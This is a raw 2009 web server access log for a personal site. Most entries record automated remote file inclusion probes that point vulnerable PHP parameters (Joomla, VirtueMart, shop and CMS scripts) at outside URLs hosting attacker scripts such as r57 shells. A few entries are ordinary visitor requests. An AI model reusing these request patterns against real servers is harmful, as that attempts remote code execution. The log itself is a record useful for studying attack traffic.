123.143.98.5 - - [22/May/2009:10:57:11 -0700] "GET /logs/access_080526.log//index2.php?option=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:57:23 -0700] "GET /logs/access_090318.log//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:57:23 -0700] "GET /shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:57:23 -0700] "GET /logs//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:57:24 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:57:26 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.239.76.25 - - [22/May/2009:10:57:28 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [22/May/2009:10:57:28 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [22/May/2009:10:57:28 -0700] "GET /logs/access_090501.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [22/May/2009:10:57:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [22/May/2009:10:57:30 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [22/May/2009:10:57:30 -0700] "GET /logs/access_080306.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [22/May/2009:10:57:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [22/May/2009:10:57:33 -0700] "GET /logs/access_080306.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [22/May/2009:10:57:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
95.168.170.105 - - [22/May/2009:10:57:39 -0700] "GET /shop/main.php?_shop_path=http://www.diga-pro.es/r57/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
95.168.170.105 - - [22/May/2009:10:57:40 -0700] "GET /logs//shop/main.php?_shop_path=http://www.diga-pro.es/r57/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
217.29.159.130 - - [22/May/2009:10:57:40 -0700] "GET /shop/main.php?_shop_path=http://propertiesmalaysia.com.my/ugc_files/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.29.159.130 - - [22/May/2009:10:57:40 -0700] "GET /logs//shop/main.php?_shop_path=http://propertiesmalaysia.com.my/ugc_files/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:10:57:47 -0700] "GET /logs/access_080303.log/popup.php?path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.76.25 - - [22/May/2009:10:57:48 -0700] "GET /logs/access_090512.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.59.148.76 - - [22/May/2009:10:57:50 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.casualife.ru/Top.txt? HTTP/1.1" 200 42067 "-" "libwww-perl/5.69" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:57:56 -0700] "GET /logs/access_080715.log//trans/trans.php?trans=&page=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:57:56 -0700] "GET /trans/trans.php?trans=&page=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:57:56 -0700] "GET /logs//trans/trans.php?trans=&page=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:57:57 -0700] "GET /logs/access_080715.log//trans/trans.php?trans=&page=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:57:57 -0700] "GET /trans/trans.php?trans=&page=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:57:58 -0700] "GET /logs//trans/trans.php?trans=&page=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.230.102 - - [22/May/2009:10:58:09 -0700] "GET /logs/access_080419.log%20%20//errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.102 - - [22/May/2009:10:58:09 -0700] "GET /logs/access_080611.log%20%20//errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:10:58:10 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [22/May/2009:10:58:11 -0700] "GET /logs/access_080426.log/encapscms_PATH/core/core.php?root=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [22/May/2009:10:58:11 -0700] "GET /logs/access_080522.log/encapscms_PATH/core/core.php?root=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:10:58:13 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://bajingan2.fileave.com/id2.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:58:14 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
222.239.227.229 - - [22/May/2009:10:58:16 -0700] "GET /logs/access_081118.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.239.227.229 - - [22/May/2009:10:58:16 -0700] "GET /logs/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:10:58:18 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:10:58:18 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:10:58:18 -0700] "GET /logs/access_081023.log/SQuery/lib/gore.php?libpath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:58:27 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
123.143.98.5 - - [22/May/2009:10:58:29 -0700] "GET /logs/access_080526.log//index2.php?option=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:10:58:30 -0700] "GET /logs/access_081105.log/homepage.php?sel=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:10:58:30 -0700] "GET /homepage.php?sel=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:10:58:30 -0700] "GET /logs/homepage.php?sel=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:58:31 -0700] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:58:31 -0700] "GET /logs/access_090216.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:58:32 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:58:32 -0700] "GET /logs/access_090317.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.168.68.198 - - [22/May/2009:10:58:32 -0700] "GET /bikes/004.JPG HTTP/1.1" 200 2555904 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
86.168.68.198 - - [22/May/2009:10:58:32 -0700] "GET /bikes/002.JPG HTTP/1.1" 200 2949120 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
86.168.68.198 - - [22/May/2009:10:58:32 -0700] "GET /bikes/003.JPG HTTP/1.1" 200 2883584 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
91.121.210.42 - - [22/May/2009:10:58:33 -0700] "GET /logs/access_080820.log/homepage.php?sel=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:58:35 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:58:35 -0700] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:58:36 -0700] "GET /logs/access_090317.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:58:37 -0700] "GET /shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:58:39 -0700] "GET /logs/access_090216.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:10:58:44 -0700] "GET /logs/access_080817.log/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:58:45 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:10:58:45 -0700] "GET /SQuery/lib/gore.php?libpath=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:10:58:46 -0700] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:10:58:47 -0700] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:58:49 -0700] "GET /logs/access_090206.log//skin_shop/s_img/plugin/twindow_cart.php?shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:58:49 -0700] "GET /skin_shop/s_img/plugin/twindow_cart.php?shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:58:49 -0700] "GET /logs//skin_shop/s_img/plugin/twindow_cart.php?shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:10:58:49 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:10:58:49 -0700] "GET /logs/access_081023.log/SQuery/lib/gore.php?libpath=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:10:58:53 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:10:58:54 -0700] "GET /SQuery/lib/gore.php?libpath=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:58:54 -0700] "GET /logs/access_090318.log//skin_shop/s_img/plugin/twindow_cart.php?shop_this_skin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:10:58:57 -0700] "GET /logs/access_081023.log%20%20/SQuery/lib/gore.php?libpath=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.59.148.76 - - [22/May/2009:10:59:04 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.casualife.ru/Top.txt? HTTP/1.1" 200 42066 "-" "libwww-perl/5.69" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:10:59:07 -0700] "GET /logs/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:10:59:07 -0700] "GET /homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:10:59:07 -0700] "GET /logs/access_080820.log/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:10:59:07 -0700] "GET /logs/access_081105.log/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:10:59:10 -0700] "GET /logs/access_081105.log%20%20/homepage.php?sel=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:10:59:12 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 200 42005 "-" "Mozilla/5.0" "www.dmulk.com"
86.168.68.198 - - [22/May/2009:10:59:31 -0700] "GET /bikes/002.JPG HTTP/1.1" 206 983040 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
91.121.210.42 - - [22/May/2009:10:59:31 -0700] "GET /logs/access_080820.log%20%20/homepage.php?sel=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.168.68.198 - - [22/May/2009:10:59:31 -0700] "GET /bikes/003.JPG HTTP/1.1" 206 983040 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
86.168.68.198 - - [22/May/2009:10:59:34 -0700] "GET /bikes/004.JPG HTTP/1.1" 206 1245184 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "dmulk.com"
203.251.81.216 - - [22/May/2009:10:59:41 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:10:59:41 -0700] "GET /logs/access_081023.log/SQuery/lib/gore.php?libpath=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:10:59:43 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:10:59:51 -0700] "GET /logs/access_080303.log/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:59:56 -0700] "GET /logs/access_090208.log//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.113.100.53 - - [22/May/2009:10:59:59 -0700] "GET /bikes/occcb/ebayisapi.dll.htm HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Fedora Core 6) FC6 GnomeDE [ru]" "dmulk.com"
203.94.155.59 - - [22/May/2009:11:00:02 -0700] "GET /logs/access_080820.log/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:11:00:02 -0700] "GET /logs/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:11:00:02 -0700] "GET /homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:11:00:02 -0700] "GET /logs/access_081105.log/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:11:00:02 -0700] "GET /logs/access_081105.log%20%20/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:11:00:14 -0700] "GET /logs/access_080820.log%20%20/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.77.136.153 - - [22/May/2009:11:00:31 -0700] "HEAD /bikes/occcb/eBayISAPI.dll.htm HTTP/1.0" 200 0 "-" "Mozilla/3.0 [en] (compatible; Win98; U)" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:11:00:37 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:11:00:43 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:11:00:43 -0700] "GET /logs/access_081023.log%20%20/SQuery/lib/gore.php?libpath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:11:00:43 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:11:00:52 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:11:00:52 -0700] "GET /logs/access_081023.log/SQuery/lib/gore.php?libpath=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:11:00:55 -0700] "GET /SQuery/lib/gore.php?libpath=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:11:01:03 -0700] "GET /logs/access_080820.log%20%20/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:11:01:03 -0700] "GET /logs/access_081105.log%20%20/homepage.php?sel=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:11:01:24 -0700] "GET /logs/access_090512.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:11:01:34 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:11:01:34 -0700] "GET /logs/access_081023.log/SQuery/lib/gore.php?libpath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
116.125.126.72 - - [22/May/2009:11:01:35 -0700] "GET /logs/access_090227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:11:01:37 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
116.125.126.72 - - [22/May/2009:11:01:37 -0700] "GET /logs/access_090106.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:11:01:42 -0700] "GET /logs/access_080223.log/errors.php?error=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:11:02:16 -0700] "GET /logs/access_080512.log//skin/zero_vote/admin.php?dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:11:02:17 -0700] "GET /skin/zero_vote/admin.php?dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:11:02:18 -0700] "GET /logs//skin/zero_vote/admin.php?dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:11:02:21 -0700] "GET /main.php?site=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [22/May/2009:11:02:21 -0700] "GET /logs/main.php?site=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
